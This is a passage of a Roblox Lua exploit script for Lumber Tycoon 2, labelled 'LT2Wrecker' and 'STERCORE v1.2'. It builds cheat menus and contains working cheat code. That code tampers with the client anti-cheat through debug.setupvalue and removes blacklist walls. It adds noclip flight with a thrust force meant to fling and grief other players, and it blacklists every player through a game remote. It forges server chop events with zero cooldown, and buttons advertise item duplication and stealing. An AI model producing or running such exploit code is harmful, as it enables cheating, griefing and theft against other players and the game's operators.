  3334. InfoTUT.TextColor3 = Color3.new(1, 1, 0)
  3335. InfoTUT.TextSize = 14
  3336. InfoTUT.TextWrapped = true
  3337.  
  3338. Closetut.Name = "Closetut"
  3339. Closetut.Parent = Tutorialfrm
  3340. Closetut.BackgroundColor3 = Color3.new(0, 0, 0)
  3341. Closetut.BackgroundTransparency = 0.5
  3342. Closetut.BorderColor3 = Color3.new(1, 1, 0)
  3343. Closetut.BorderSizePixel = 2
  3344. Closetut.Position = UDim2.new(0, 0, 0.894999981, 0)
  3345. Closetut.Size = UDim2.new(0, 100, 0, 21)
  3346. Closetut.Font = Enum.Font.SciFi
  3347. Closetut.Text = "Close"
  3348. Closetut.TextColor3 = Color3.new(1, 1, 0)
  3349. Closetut.TextScaled = true
  3350. Closetut.TextSize = 14
  3351. Closetut.TextWrapped = true
  3352.  
  3353. Credits0.Name = "Credits0"
  3354. Credits0.Parent = Main
  3355. Credits0.BackgroundColor3 = Color3.new(0, 0, 0)
  3356. Credits0.BackgroundTransparency = 0.69999998807907
  3357. Credits0.BorderColor3 = Color3.new(1, 1, 0)
  3358. Credits0.BorderSizePixel = 2
  3359. Credits0.Position = UDim2.new(-0.909090936, 0, 0, 0)
  3360. Credits0.Size = UDim2.new(0, 200, 0, 20)
  3361. Credits0.Font = Enum.Font.SourceSans
  3362. Credits0.Text = "Script made by JackMcJagger15"
  3363. Credits0.TextColor3 = Color3.new(1, 1, 0)
  3364. Credits0.TextScaled = true
  3365. Credits0.TextSize = 14
  3366. Credits0.TextWrapped = true
  3367.  
  3368. Credits1.Name = "Credits1"
  3369. Credits1.Parent = Main
  3370. Credits1.BackgroundColor3 = Color3.new(0, 0, 0)
  3371. Credits1.BackgroundTransparency = 0.69999998807907
  3372. Credits1.BorderColor3 = Color3.new(1, 1, 0)
  3373. Credits1.BorderSizePixel = 2
  3374. Credits1.Position = UDim2.new(-0.909090936, 0, 0.100000001, 0)
  3375. Credits1.Size = UDim2.new(0, 200, 0, 20)
  3376. Credits1.Font = Enum.Font.SourceSans
  3377. Credits1.Text = "GUI made by @Big Boss#0001"
  3378. Credits1.TextColor3 = Color3.new(1, 1, 0)
  3379. Credits1.TextScaled = true
  3380. Credits1.TextSize = 14
  3381. Credits1.TextWrapped = true
  3382.  
  3383. Openfrm.Name = "Openfrm"
  3384. Openfrm.Parent = LT2Wrecker
  3385. Openfrm.BackgroundColor3 = Color3.new(0, 0, 0)
  3386. Openfrm.BackgroundTransparency = 0.69999998807907
  3387. Openfrm.BorderColor3 = Color3.new(1, 1, 0)
  3388. Openfrm.Position = UDim2.new(0.363138676, 0, 0.0321543403, 0)
  3389. Openfrm.Size = UDim2.new(0, 100, 0, 27)
  3390.  
  3391. Open.Name = "Open"
  3392. Open.Parent = Openfrm
  3393. Open.BackgroundColor3 = Color3.new(0, 0, 0)
  3394. Open.BackgroundTransparency = 0.60000002384186
  3395. Open.BorderColor3 = Color3.new(1, 1, 0)
  3396. Open.Position = UDim2.new(0, 0, 0.148148149, 0)
  3397. Open.Size = UDim2.new(0, 100, 0, 18)
  3398. Open.Font = Enum.Font.SciFi
  3399. Open.Text = "OPEN"
  3400. Open.TextColor3 = Color3.new(1, 1, 0)
  3401. Open.TextScaled = true
  3402. Open.TextSize = 14
  3403. Open.TextWrapped = true
  3404. -- Scripts:
  3405. Open.MouseButton1Click:connect(function()
  3406. Main.Visible = true
  3407. Openfrm:Destroy()
  3408. end)
  3409. AntiBlack.MouseButton1Click:connect(function()
  3410. local plr = game.Players.LocalPlayer
  3411. local cframe
  3412. for i,v in next, workspace:GetDescendants() do
  3413. if v:IsA("SpawnLocation") then
  3414. v.Touched:Connect(function(h)
  3415. if h.Parent == plr.Character and cframe then
  3416. plr.Character:SetPrimaryPartCFrame(cframe)
  3417. end
  3418. end)
  3419. end
  3420. end
  3421.  
  3422. game:GetService("RunService"):BindToRenderStep("NO HACKS",Enum.RenderPriority.Last.Value,function()
  3423. if game.Players.LocalPlayer.Character.PrimaryPart then
  3424. cframe = game.Players.LocalPlayer.Character.PrimaryPart.CFrame
  3425. end
  3426. end)
  3427.  
  3428. for i,v in next, debug.getregistry() do
  3429. if type(v)=='function' and debug.getupvalues(v).lastUpdate then
  3430. debug.setupvalue(v,"lastUpdate",math.huge)
  3431. break
  3432. end
  3433. end
  3434.  
  3435. for i,v in next, workspace.Effects:GetChildren() do
  3436. if v:IsA("BasePart") and v.Name == "BlacklistWall" then
  3437. v:Destroy()
  3438. end
  3439. end
  3440.  
  3441. end)
  3442. Close.MouseButton1Click:connect(function()
  3443. Main:Destroy()
  3444. end)
  3445. GriefFly.MouseButton1Click:connect(function()
  3446. Speed = 1
  3447. Force = 500000
  3448.  
  3449. --Script:
  3450. lplayer = game:GetService("Players").LocalPlayer
  3451. Mouse = lplayer:GetMouse()
  3452. speedfly = Speed
  3453. T = lplayer.Character.HumanoidRootPart
  3454. CONTROL = {F = 0, B = 0, L = 0, R = 0}
  3455. lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  3456.  
  3457. local function fly()
  3458. flying = true
  3459. local BG = Instance.new('BodyGyro', T)
  3460. local BV = Instance.new('BodyVelocity', T)
  3461. BG.P = 9e4
  3462. BG.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  3463. BG.cframe = T.CFrame
  3464. BV.velocity = Vector3.new(0, 0.1, 0)
  3465. BV.maxForce = Vector3.new(9e9, 9e9, 9e9)
  3466. spawn(function()
  3467. repeat wait()
  3468. lplayer.Character.Humanoid.PlatformStand = true
  3469. if CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0 then
  3470. SPEED = 50
  3471. elseif not (CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0) and SPEED ~= 0 then
  3472. SPEED = 0
  3473. end
  3474. if (CONTROL.L + CONTROL.R) ~= 0 or (CONTROL.F + CONTROL.B) ~= 0 then
  3475. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (CONTROL.F + CONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(CONTROL.L + CONTROL.R, (CONTROL.F + CONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  3476. lCONTROL = {F = CONTROL.F, B = CONTROL.B, L = CONTROL.L, R = CONTROL.R}
  3477. elseif (CONTROL.L + CONTROL.R) == 0 and (CONTROL.F + CONTROL.B) == 0 and SPEED ~= 0 then
  3478. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (lCONTROL.F + lCONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(lCONTROL.L + lCONTROL.R, (lCONTROL.F + lCONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  3479. else
  3480. BV.velocity = Vector3.new(0, 0.1, 0)
  3481. end
  3482. BG.cframe = workspace.CurrentCamera.CoordinateFrame
  3483. until not flying
  3484. CONTROL = {F = 0, B = 0, L = 0, R = 0}
  3485. lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  3486. SPEED = 0
  3487. BG:destroy()
  3488. BV:destroy()
  3489. lplayer.Character.Humanoid.PlatformStand = false
  3490. end)
  3491. end
  3492. Mouse.KeyDown:connect(function(KEY)
  3493. if KEY:lower() == 'w' then
  3494. CONTROL.F = speedfly
  3495. elseif KEY:lower() == 's' then
  3496. CONTROL.B = -speedfly
  3497. elseif KEY:lower() == 'a' then
  3498. CONTROL.L = -speedfly
  3499. elseif KEY:lower() == 'd' then
  3500. CONTROL.R = speedfly
  3501. end
  3502. end)
  3503. Mouse.KeyUp:connect(function(KEY)
  3504. if KEY:lower() == 'w' then
  3505. CONTROL.F = 0
  3506. elseif KEY:lower() == 's' then
  3507. CONTROL.B = 0
  3508. elseif KEY:lower() == 'a' then
  3509. CONTROL.L = 0
  3510. elseif KEY:lower() == 'd' then
  3511. CONTROL.R = 0
  3512. end
  3513. end)
  3514. fly()
  3515.  
  3516.  
  3517. -- Made by JackMcJagger15
  3518.  
  3519. power = Force -- change this to make it more or less powerful
  3520.  
  3521. game:GetService('RunService').Stepped:connect(function()
  3522. game.Players.LocalPlayer.Character.Head.CanCollide = false
  3523. game.Players.LocalPlayer.Character.Torso.CanCollide = false
  3524. game.Players.LocalPlayer.Character["Left Leg"].CanCollide = false
  3525. game.Players.LocalPlayer.Character["Right Leg"].CanCollide = false
  3526. end)
  3527.  
  3528. wait(.1)
  3529. local bambam = Instance.new("BodyThrust")
  3530. bambam.Parent = game.Players.LocalPlayer.Character.HumanoidRootPart
  3531. bambam.Force = Vector3.new(power,0,power)
  3532. bambam.Location = game.Players.LocalPlayer.Character.HumanoidRootPart.Position
  3533.  
  3534. while wait(0.2) do
  3535. game.Players.LocalPlayer.Character:WaitForChild("Humanoid").Died:connect(function()
  3536. script:Remove()
  3537. end)
  3538. end
  3539. end)
  3540. Tutorial.MouseButton1Click:connect(function()
  3541. Tutorialfrm.Visible = true
  3542. end)
  3543. Closetut.MouseButton1Click:connect(function()
  3544. Tutorialfrm.Visible = false
  3545. end)
  3546.  
  3547. end)
  3548.  
  3549. Close.Name = "Close"
  3550. Close.Parent = Main
  3551. Close.BackgroundColor3 = Color3.new(1, 1, 1)
  3552. Close.Position = UDim2.new(0.924487948, 0, 0.0288124979, 0)
  3553. Close.Size = UDim2.new(0, 14, 0, 16)
  3554. Close.Font = Enum.Font.SourceSans
  3555. Close.Text = "X"
  3556. Close.TextColor3 = Color3.new(0, 0, 0)
  3557. Close.TextSize = 14
  3558. Main.Visible = false
  3559. OpenFrame.Visible = true
  3560. StercoreGUI.Name = "StercoreGUI"
  3561. StercoreGUI.Parent = Main
  3562. StercoreGUI.BackgroundColor3 = Color3.new(1, 1, 1)
  3563. StercoreGUI.Position = UDim2.new(0.053763438, 0, 0.694063962, 0)
  3564. StercoreGUI.Size = UDim2.new(0, 161, 0, 30)
  3565. StercoreGUI.Font = Enum.Font.Gotham
  3566. StercoreGUI.Text = "StercoreGUI"
  3567. StercoreGUI.TextColor3 = Color3.new(0, 0, 0)
  3568. StercoreGUI.TextSize = 14
  3569. StercoreGUI.MouseButton1Down:connect(function()
  3570. --- by Dissapear#6969
  3571. -- testing GUI
  3572. local Option = false
  3573. local Found = false
  3574. local Tool = "None"
  3575. local Down = false
  3576. local Mouse = game.Players.LocalPlayer:GetMouse()
  3577.  
  3578. Client = game.ReplicatedStorage.Interaction.ClientSetListPlayer
  3579. players = game.Players
  3580. for i, v in pairs(players:GetPlayers()) do
  3581. if v.Name ~= players.LocalPlayer.Name then
  3582. Client:InvokeServer(players.LocalPlayer.BlacklistFolder, v, true)
  3583. end
  3584. end
  3585. players.PlayerAdded:connect(function(plr)
  3586. Client:InvokeServer(players.LocalPlayer.BlacklistFolder, plr, true)
  3587. end)
  3588.  
  3589. function move(object)
  3590. object:MoveTo(game.Players.LocalPlayer.Character.Head.Position + Vector3.new(5, -4, 5))
  3591. object.WoodSection.Anchored = true
  3592. wait(2)
  3593. object.WoodSection.Anchored = false
  3594. end
  3595.  
  3596. function tree(object, class)
  3597. for i, v in pairs(object:GetChildren()) do
  3598. if v.Name == "TreeClass" then
  3599. if v.Value == class then
  3600. if Found == false then
  3601. move(object)
  3602. Found = true
  3603. end
  3604. end
  3605. end
  3606. end
  3607. end
  3608.  
  3609. local Stercore = Instance.new("ScreenGui")
  3610. local Main = Instance.new("Frame")
  3611. local ShadowMainFrame = Instance.new("Frame")
  3612. local Fastchop = Instance.new("TextButton")
  3613. local ShadowMainFrame_2 = Instance.new("Frame")
  3614. local SellPlank = Instance.new("TextButton")
  3615. local ShadowMainFrame_3 = Instance.new("Frame")
  3616. local SellWood = Instance.new("TextButton")
  3617. local ShadowMainFrame_4 = Instance.new("Frame")
  3618. local ModedWire = Instance.new("TextButton")
  3619. local ShadowMainFrame_5 = Instance.new("Frame")
  3620. local SpeedQ = Instance.new("TextButton")
  3621. local ShadowMainFrame_6 = Instance.new("Frame")
  3622. local Dupe = Instance.new("TextButton")
  3623. local ShadowMainFrame_7 = Instance.new("Frame")
  3624. local Tpyourbase = Instance.new("TextButton")
  3625. local ShadowMainFrame_8 = Instance.new("Frame")
  3626. local AntiBL = Instance.new("TextButton")
  3627. local ShadowMainFrame_9 = Instance.new("Frame")
  3628. local InfinityJump = Instance.new("TextButton")
  3629. local ShadowMainFrame_10 = Instance.new("Frame")
  3630. local Header = Instance.new("Frame")
  3631. local ShadowMainFrame_11 = Instance.new("Frame")
  3632. local Close = Instance.new("TextButton")
  3633. local ShadowMainFrame_12 = Instance.new("Frame")
  3634. local StealGUI = Instance.new("TextButton")
  3635. local ShadowMainFrame_13 = Instance.new("Frame")
  3636. local TextLabel = Instance.new("TextLabel")
  3637.  
  3638. -- Properties
  3639.  
  3640. Stercore.Name = "Stercore"
  3641. Stercore.Parent = game.CoreGui
  3642.  
  3643. Main.Name = "Main"
  3644. Main.Parent = Stercore
  3645. Main.Active = true
  3646. Main.BackgroundColor3 = Color3.new(0.92549, 0.92549, 0.92549)
  3647. Main.BorderSizePixel = 0
  3648. Main.Position = UDim2.new(0.315, 0, 0.117, 0)
  3649. Main.Size = UDim2.new(0, 405, 0, 405)
  3650. Main.Draggable = true
  3651.  
  3652. ShadowMainFrame.Name = "ShadowMainFrame"
  3653. ShadowMainFrame.Parent = Main
  3654. ShadowMainFrame.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3655. ShadowMainFrame.BorderSizePixel = 0
  3656. ShadowMainFrame.Position = UDim2.new(0, 0, 0.981249988, 0)
  3657. ShadowMainFrame.Size = UDim2.new(0, 405, 0, 6)
  3658.  
  3659. Fastchop.Name = "Fastchop"
  3660. Fastchop.Parent = Main
  3661. Fastchop.BackgroundColor3 = Color3.new(1, 0, 0)
  3662. Fastchop.BorderSizePixel = 0
  3663. Fastchop.Position = UDim2.new(0.0740740746, 0, 0.228125006, 0)
  3664. Fastchop.Size = UDim2.new(0, 159, 0, 41)
  3665. Fastchop.Font = Enum.Font.Cartoon
  3666. Fastchop.Text = "Fast Chop"
  3667. Fastchop.TextColor3 = Color3.new(0, 0, 0)
  3668. Fastchop.TextSize = 14
  3669. Fastchop.TextStrokeTransparency = 0.80000001192093
  3670.  
  3671. ShadowMainFrame_2.Name = "ShadowMainFrame"
  3672. ShadowMainFrame_2.Parent = Fastchop
  3673. ShadowMainFrame_2.BackgroundColor3 = Color3.new(0.647059, 0, 0)
  3674. ShadowMainFrame_2.BorderColor3 = Color3.new(0, 0.407843, 0)
  3675. ShadowMainFrame_2.BorderSizePixel = 0
  3676. ShadowMainFrame_2.Position = UDim2.new(0, 0, 0.853658557, 0)
  3677. ShadowMainFrame_2.Size = UDim2.new(0, 159, 0, 6)
  3678.  
  3679. SellPlank.Name = "SellPlank"
  3680. SellPlank.Parent = Main
  3681. SellPlank.BackgroundColor3 = Color3.new(1, 1, 1)
  3682. SellPlank.BorderSizePixel = 0
  3683. SellPlank.Position = UDim2.new(0.0740740746, 0, 0.381250024, 0)
  3684. SellPlank.Size = UDim2.new(0, 159, 0, 41)
  3685. SellPlank.Font = Enum.Font.Cartoon
  3686. SellPlank.Text = "Sell Owned Plank"
  3687. SellPlank.TextColor3 = Color3.new(0, 0, 0)
  3688. SellPlank.TextSize = 14
  3689. SellPlank.TextStrokeTransparency = 0.80000001192093
  3690.  
  3691. ShadowMainFrame_3.Name = "ShadowMainFrame"
  3692. ShadowMainFrame_3.Parent = SellPlank
  3693. ShadowMainFrame_3.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3694. ShadowMainFrame_3.BorderSizePixel = 0
  3695. ShadowMainFrame_3.Position = UDim2.new(0, 0, 0.853658557, 0)
  3696. ShadowMainFrame_3.Size = UDim2.new(0, 159, 0, 6)
  3697.  
  3698. SellWood.Name = "SellWood"
  3699. SellWood.Parent = Main
  3700. SellWood.BackgroundColor3 = Color3.new(1, 1, 1)
  3701. SellWood.BorderSizePixel = 0
  3702. SellWood.Position = UDim2.new(0.0740740746, 0, 0.534375012, 0)
  3703. SellWood.Size = UDim2.new(0, 159, 0, 41)
  3704. SellWood.Font = Enum.Font.Cartoon
  3705. SellWood.Text = "Sell Owned Wood"
  3706. SellWood.TextColor3 = Color3.new(0, 0, 0)
  3707. SellWood.TextSize = 14
  3708. SellWood.TextStrokeTransparency = 0.80000001192093
  3709.  
  3710. ShadowMainFrame_4.Name = "ShadowMainFrame"
  3711. ShadowMainFrame_4.Parent = SellWood
  3712. ShadowMainFrame_4.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3713. ShadowMainFrame_4.BorderSizePixel = 0
  3714. ShadowMainFrame_4.Position = UDim2.new(0, 0, 0.853658557, 0)
  3715. ShadowMainFrame_4.Size = UDim2.new(0, 159, 0, 6)
  3716.  
  3717. ModedWire.Name = "ModedWire"
  3718. ModedWire.Parent = Main
  3719. ModedWire.BackgroundColor3 = Color3.new(1, 1, 1)
  3720. ModedWire.BorderSizePixel = 0
  3721. ModedWire.Position = UDim2.new(0.0740740746, 0, 0.684375048, 0)
  3722. ModedWire.Size = UDim2.new(0, 159, 0, 41)
  3723. ModedWire.Font = Enum.Font.Bodoni
  3724. ModedWire.Text = "Modded Wire"
  3725. ModedWire.TextColor3 = Color3.new(0, 0, 0)
  3726. ModedWire.TextSize = 14
  3727. ModedWire.TextStrokeTransparency = 0.80000001192093
  3728.  
  3729. ShadowMainFrame_5.Name = "ShadowMainFrame"
  3730. ShadowMainFrame_5.Parent = ModedWire
  3731. ShadowMainFrame_5.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3732. ShadowMainFrame_5.BorderSizePixel = 0
  3733. ShadowMainFrame_5.Position = UDim2.new(0, 0, 0.853658557, 0)
  3734. ShadowMainFrame_5.Size = UDim2.new(0, 159, 0, 6)
  3735.  
  3736. SpeedQ.Name = "SpeedQ"
  3737. SpeedQ.Parent = Main
  3738. SpeedQ.BackgroundColor3 = Color3.new(1, 1, 1)
  3739. SpeedQ.BorderSizePixel = 0
  3740. SpeedQ.Position = UDim2.new(0.0740740746, 0, 0.834375024, 0)
  3741. SpeedQ.Size = UDim2.new(0, 159, 0, 41)
  3742. SpeedQ.Font = Enum.Font.Cartoon
  3743. SpeedQ.Text = "Speed (Q)"
  3744. SpeedQ.TextColor3 = Color3.new(0, 0, 0)
  3745. SpeedQ.TextSize = 14
  3746. SpeedQ.TextStrokeTransparency = 0.80000001192093
  3747.  
  3748. ShadowMainFrame_6.Name = "ShadowMainFrame"
  3749. ShadowMainFrame_6.Parent = SpeedQ
  3750. ShadowMainFrame_6.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3751. ShadowMainFrame_6.BorderSizePixel = 0
  3752. ShadowMainFrame_6.Position = UDim2.new(0, 0, 0.853658557, 0)
  3753. ShadowMainFrame_6.Size = UDim2.new(0, 159, 0, 6)
  3754.  
  3755. Dupe.Name = "Dupe"
  3756. Dupe.Parent = Main
  3757. Dupe.BackgroundColor3 = Color3.new(1, 0, 0)
  3758. Dupe.BorderSizePixel = 0
  3759. Dupe.Position = UDim2.new(0.538271606, 0, 0.228125006, 0)
  3760. Dupe.Size = UDim2.new(0, 159, 0, 41)
  3761. Dupe.Font = Enum.Font.Cartoon
  3762. Dupe.Text = "Dupe"
  3763. Dupe.TextColor3 = Color3.new(0, 0, 0)
  3764. Dupe.TextSize = 14
  3765. Dupe.TextStrokeTransparency = 0.80000001192093
  3766.  
  3767. ShadowMainFrame_7.Name = "ShadowMainFrame"
  3768. ShadowMainFrame_7.Parent = Dupe
  3769. ShadowMainFrame_7.BackgroundColor3 = Color3.new(0.647059, 0, 0)
  3770. ShadowMainFrame_7.BorderSizePixel = 0
  3771. ShadowMainFrame_7.Position = UDim2.new(0, 0, 0.853658557, 0)
  3772. ShadowMainFrame_7.Size = UDim2.new(0, 159, 0, 6)
  3773.  
  3774. Tpyourbase.Name = "Tpyourbase"
  3775. Tpyourbase.Parent = Main
  3776. Tpyourbase.BackgroundColor3 = Color3.new(1, 1, 1)
  3777. Tpyourbase.BorderSizePixel = 0
  3778. Tpyourbase.Position = UDim2.new(0.538271606, 0, 0.381250024, 0)
  3779. Tpyourbase.Size = UDim2.new(0, 159, 0, 41)
  3780. Tpyourbase.Font = Enum.Font.Cartoon
  3781. Tpyourbase.Text = "Tp to your base"
  3782. Tpyourbase.TextColor3 = Color3.new(0, 0, 0)
  3783. Tpyourbase.TextSize = 14
  3784. Tpyourbase.TextStrokeTransparency = 0.80000001192093
  3785.  
  3786. ShadowMainFrame_8.Name = "ShadowMainFrame"
  3787. ShadowMainFrame_8.Parent = Tpyourbase
  3788. ShadowMainFrame_8.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3789. ShadowMainFrame_8.BorderSizePixel = 0
  3790. ShadowMainFrame_8.Position = UDim2.new(0, 0, 0.853658557, 0)
  3791. ShadowMainFrame_8.Size = UDim2.new(0, 159, 0, 6)
  3792.  
  3793. AntiBL.Name = "AntiBL"
  3794. AntiBL.Parent = Main
  3795. AntiBL.BackgroundColor3 = Color3.new(1, 1, 1)
  3796. AntiBL.BorderSizePixel = 0
  3797. AntiBL.Position = UDim2.new(0.538271606, 0, 0.534375012, 0)
  3798. AntiBL.Size = UDim2.new(0, 159, 0, 41)
  3799. AntiBL.Font = Enum.Font.Cartoon
  3800. AntiBL.Text = "Anti Blacklist"
  3801. AntiBL.TextColor3 = Color3.new(0, 0, 0)
  3802. AntiBL.TextSize = 14
  3803. AntiBL.TextStrokeTransparency = 0.80000001192093
  3804.  
  3805. ShadowMainFrame_9.Name = "ShadowMainFrame"
  3806. ShadowMainFrame_9.Parent = AntiBL
  3807. ShadowMainFrame_9.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3808. ShadowMainFrame_9.BorderSizePixel = 0
  3809. ShadowMainFrame_9.Position = UDim2.new(0, 0, 0.853658557, 0)
  3810. ShadowMainFrame_9.Size = UDim2.new(0, 159, 0, 6)
  3811.  
  3812. InfinityJump.Name = "InfinityJump"
  3813. InfinityJump.Parent = Main
  3814. InfinityJump.BackgroundColor3 = Color3.new(1, 1, 1)
  3815. InfinityJump.BorderSizePixel = 0
  3816. InfinityJump.Position = UDim2.new(0.538271606, 0, 0.834375024, 0)
  3817. InfinityJump.Size = UDim2.new(0, 159, 0, 41)
  3818. InfinityJump.Font = Enum.Font.Cartoon
  3819. InfinityJump.Text = "Infinity Jump"
  3820. InfinityJump.TextColor3 = Color3.new(0, 0, 0)
  3821. InfinityJump.TextSize = 14
  3822. InfinityJump.TextStrokeTransparency = 0.80000001192093
  3823.  
  3824. ShadowMainFrame_10.Name = "ShadowMainFrame"
  3825. ShadowMainFrame_10.Parent = InfinityJump
  3826. ShadowMainFrame_10.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3827. ShadowMainFrame_10.BorderSizePixel = 0
  3828. ShadowMainFrame_10.Position = UDim2.new(0, 0, 0.853658557, 0)
  3829. ShadowMainFrame_10.Size = UDim2.new(0, 159, 0, 6)
  3830.  
  3831. Header.Name = "Header"
  3832. Header.Parent = Main
  3833. Header.BackgroundColor3 = Color3.new(1, 1, 1)
  3834. Header.BorderSizePixel = 0
  3835. Header.Size = UDim2.new(0, 363, 0, 35)
  3836.  
  3837. ShadowMainFrame_11.Name = "ShadowMainFrame"
  3838. ShadowMainFrame_11.Parent = Header
  3839. ShadowMainFrame_11.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3840. ShadowMainFrame_11.BorderSizePixel = 0
  3841. ShadowMainFrame_11.Position = UDim2.new(0, 0, 0.828571439, 0)
  3842. ShadowMainFrame_11.Size = UDim2.new(0, 363, 0, 6)
  3843.  
  3844. Close.Name = "Close"
  3845. Close.Parent = Main
  3846. Close.BackgroundColor3 = Color3.new(0.584314, 0, 0)
  3847. Close.BorderSizePixel = 0
  3848. Close.Position = UDim2.new(0.896296322, 0, 0, 0)
  3849. Close.Size = UDim2.new(0, 42, 0, 35)
  3850. Close.Font = Enum.Font.Cartoon
  3851. Close.Text = "X"
  3852. Close.TextColor3 = Color3.new(0, 0, 0)
  3853. Close.TextSize = 18
  3854. Close.TextStrokeTransparency = 0.69999998807907
  3855.  
  3856. ShadowMainFrame_12.Name = "ShadowMainFrame"
  3857. ShadowMainFrame_12.Parent = Close
  3858. ShadowMainFrame_12.BackgroundColor3 = Color3.new(0.329412, 0, 0)
  3859. ShadowMainFrame_12.BorderSizePixel = 0
  3860. ShadowMainFrame_12.Position = UDim2.new(0, 0, 0.853658617, 0)
  3861. ShadowMainFrame_12.Size = UDim2.new(0, 42, 0, 6)
  3862.  
  3863. StealGUI.Name = "StealGUI"
  3864. StealGUI.Parent = Main
  3865. StealGUI.BackgroundColor3 = Color3.new(1, 1, 1)
  3866. StealGUI.BorderSizePixel = 0
  3867. StealGUI.Position = UDim2.new(0.538271606, 0, 0.684375048, 0)
  3868. StealGUI.Size = UDim2.new(0, 159, 0, 41)
  3869. StealGUI.Font = Enum.Font.Cartoon
  3870. StealGUI.Text = "Steal Item GUI"
  3871. StealGUI.TextColor3 = Color3.new(0, 0, 0)
  3872. StealGUI.TextSize = 14
  3873. StealGUI.TextStrokeTransparency = 0.80000001192093
  3874.  
  3875. ShadowMainFrame_13.Name = "ShadowMainFrame"
  3876. ShadowMainFrame_13.Parent = StealGUI
  3877. ShadowMainFrame_13.BackgroundColor3 = Color3.new(0.87451, 0.87451, 0.87451)
  3878. ShadowMainFrame_13.BorderSizePixel = 0
  3879. ShadowMainFrame_13.Position = UDim2.new(0, 0, 0.853658557, 0)
  3880. ShadowMainFrame_13.Size = UDim2.new(0, 159, 0, 6)
  3881.  
  3882. TextLabel.Parent = Main
  3883. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  3884. TextLabel.BackgroundTransparency = 1
  3885. TextLabel.Position = UDim2.new(0.254320979, 0, 0.109375, 0)
  3886. TextLabel.Size = UDim2.new(0, 200, 0, 32)
  3887. TextLabel.Font = Enum.Font.Cartoon
  3888. TextLabel.Text = "STERCORE v1.2"
  3889. TextLabel.TextColor3 = Color3.new(0, 0, 0)
  3890. TextLabel.TextSize = 30
  3891. TextLabel.TextStrokeTransparency = 0.80000001192093
  3892.  
  3893. local opened = true
  3894. udim = Main.Position
  3895. local mouse = game:GetService("Players").LocalPlayer:GetMouse()
  3896.  
  3897. mouse.KeyDown:connect(function(key)
  3898. if key:lower() == "v" then
  3899. if opened == false then
  3900. Main:TweenPosition(udim, 'In', 'Bounce', 1, true)
  3901. opened = true
  3902. else
  3903. udim = Main.Position
  3904. Main:TweenPosition(UDim2.new(-0.421, 0, 0.129, 0), 'Out', 'Linear', 0.5, true)
  3905. opened = false
  3906. end
  3907. end
  3908. --[[
  3909. if key:lower() == "t" then
  3910. Stercore:Destroy()
  3911. end ]]--
  3912. end)
  3913.  
  3914. Close.MouseButton1Down:Connect(function()
  3915. udim = Main.Position
  3916. Main:TweenPosition(UDim2.new(-0.421, 0, 0.129, 0), 'Out', 'Linear', 0.5, true)
  3917. opened = false
  3918. end)
  3919.  
  3920. -- script
  3921. Fastchop.MouseButton1Down:connect(function()
  3922. Detect = coroutine.wrap(function()
  3923. Player = game.Players.LocalPlayer
  3924. mouse = Player:GetMouse()
  3925. mouse.Button1Down:connect(function()
  3926. MouseDown = true
  3927. end)
  3928. mouse.Button1Up:connect(function()
  3929. MouseDown = false
  3930. end)
  3931. end)
  3932. Detect()
  3933. Player = game.Players.LocalPlayer
  3934. mouse = Player:GetMouse()
  3935. game:GetService('RunService').RenderStepped:connect(function()
  3936. if Player.Character:FindFirstChild("Tool") then
  3937. if MouseDown == true then
  3938. if mouse.Target.Name == "WoodSection" then
  3939. targetWood = mouse.Target
  3940. Tool=Player.Character.Tool
  3941. ---FaceVector
  3942. Height = targetWood.CFrame:pointToObjectSpace(mouse.Hit.p).Y + targetWood.Size.Y/2
  3943. local ray = Ray.new(Player.Character.Head.Position, ((targetWood.CFrame * CFrame.new(0, Height - targetWood.Size.Y/2, 0)).p - Player.Character.Head.Position).unit * 200)
  3944. part,_,p = workspace:FindPartOnRay(ray, Player.Character)
  3945. function fixVector(V)
  3946. return Vector3.new(math.floor(V.X + 0.5), math.floor(V.Y + 0.5), math.floor(V.Z + 0.5))
  3947. end
  3948. local faceVector = fixVector(targetWood.CFrame:vectorToObjectSpace(p))
  3949. if faceVector.Y ~= 0 then
  3950. return
  3951. end
  3952. local lookAtCFrame = CFrame.new(Player.Character.Head.Position, mouse.Hit.p)
  3953. local relativeCFrame = lookAtCFrame:toObjectSpace(targetWood.CFrame * CFrame.Angles(math.pi/2, 0, 0))
  3954. local relativeLookVector = relativeCFrame.lookVector
  3955. local m = relativeLookVector.Y >= 0 and 1 or -1
  3956. if faceVector.X == 1 then
  3957. faceVector = Vector3.new(0, 0, -1) * m
  3958. elseif faceVector.X == -1 then
  3959. faceVector = Vector3.new(0, 0, 1) * m
  3960. elseif faceVector.Z == 1 then
  3961. faceVector = Vector3.new(1, 0, 0) * m
  3962. elseif faceVector.Z == -1 then
  3963. faceVector = Vector3.new(-1, 0, 0) * m
  3964. end
  3965. local cutEvent = targetWood.Parent.CutEvent
  3966. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(cutEvent, {sectionId = targetWood.ID.Value, faceVector = faceVector, height = Height, hitPoints = 0.2, cooldown = 0, cuttingClass = "Axe", tool = Player.Character.Tool})
  3967. end
  3968. end
  3969. end
  3970. end)
  3971. end)
  3972.  
  3973. SellPlank.MouseButton1Down:connect(function()
  3974. for _, Plank in pairs(game.Workspace.PlayerModels:GetChildren()) do
